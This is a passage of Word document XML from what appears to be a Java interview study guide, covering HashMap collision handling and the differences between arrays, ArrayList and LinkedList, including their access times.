    <w:p w14:paraId="44E62B17" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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the number of elements in a bucket grows large (more than 8 entries), the linked list can be converted to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to improve performance, ensuring that operations are still efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0FEC51" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076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Do You Encounter LinkedList in HashMap?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E9CCE5" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72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hen multiple keys hash to the same bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., hash collision occurs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266557F" w14:textId="77777777" w:rsidR="00E77E00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E77E00" w:rsidP="007D076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72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hen there are collisions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the elements in a bucket exceed a threshold, </w:t>
      </w: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uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</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tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to maintain those elements in the same bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B1B3DD" w14:textId="3F29C8F9"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29D7F50">
          <v:rect id="_x0000_i1490" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7531114C" w14:textId="77777777" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Toc196307627"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which among ArrayList and LinkedList will be more efficient for random access of data?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w14:paraId="02107365" w14:textId="32D28283" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>random access of data</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is more efficient than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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2790CE" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E7576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Reason:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EB01A3" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AA89AD" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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backed structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ArrayList is backed by an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant-time (O(1)) random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elements using an index. This is because arrays provide direct access to elements at any given index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3770AC48" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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andom Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In an ArrayList, accessing an element at a specific index is done in constant time, i.e., the time it takes to retrieve the element does not depend on the size of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788E1859" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E49187F" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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de-based structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: LinkedList is implemented as a doubly linked list, where each element (node) contains a reference to the previous and next elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DBE3D" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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raversal overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: To access an element at a specific index in a LinkedList, you may have to traverse the list from the head or tail until you reach the desired index. This takes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time in the worst case, where n is the number of elements in the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB81EF9" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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efficient random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The lack of direct indexing (like in an array) means that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is not as efficient for random access compared to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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E89171C" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E7576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ime Complexity Comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C489983" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383618AC" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ccess time: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constant time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5D4F7C" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBF0916" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ccess time: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linear time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CC5DF2" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E7576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to Use Which?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363CD54C" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fast random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elements. It is especially useful when frequent access to elements by index is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF89EB" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72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LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent insertions and deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the beginning or middle of the list. LinkedList is more efficient for operations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>addFirs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removeFirs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addLast()</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removeLast()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EAD6E2" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E7576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36428620" w14:textId="77777777" w:rsidR="00A836BB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A836BB" w:rsidP="00E75760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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will be more efficient for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant-time access (O(1))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to any element by index, while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requires traversal and has a linear access time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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8BC132" w14:textId="5C009684"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12CBAA1">
          <v:rect id="_x0000_i1491" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD7F66" w14:textId="4FB1FF2C" w:rsidR="0083091F" w:rsidRPr="00CE4B95" w:rsidRDefault="0083091F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc196307628"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Array, ArrayList and LinkedList? When you will use ArrayList and LinkedList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w14:paraId="3497F918" w14:textId="77777777" w:rsidR="000C1D50" w:rsidRPr="00CE4B95" w:rsidRDefault="000C1D50" w:rsidP="00E75760">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CCCC686" w14:textId="41780656" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E8DAB9" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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xed Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The size of an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is fixed at the time of creation and cannot be changed after that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1BAF17" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An array is contiguous in memory, meaning all its elements are stored in adjacent memory locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0718F4ED" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ype</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Arrays can store elements of a specific type, such as int[], String[], etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6378ED68" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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 Time</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Constant-time (O(1))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for accessing elements via index, as elements are stored in contiguous memory locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138894C" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ons/Deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inserting or deleting elements in the middle of an array is costly because it may require shifting elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F7EC45" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Example Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you know the exact number of elements in advance and do not need to modify the size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222FEDBB" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="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 numbers = new int[5];  // Array with fixed size 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BFF088" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="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umbers[0] = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B63D5" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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p>
    <w:p w14:paraId="39B18E5D" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ynamic Size</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is part of the Java Collections Framework and dynamically resizes itself when elements are added or removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAF5129" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The internal structure is an array, and as the array fills up,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automatically grows by allocating a new, larger array and copying over the elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC987C2" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ype</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can store any type of object, typically generics like ArrayList&lt;Integer&gt;, ArrayList&lt;String&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3169ECAD" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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 Time</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Constant-time (O(1))</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for accessing elements via index, similar to arrays.</w:t>
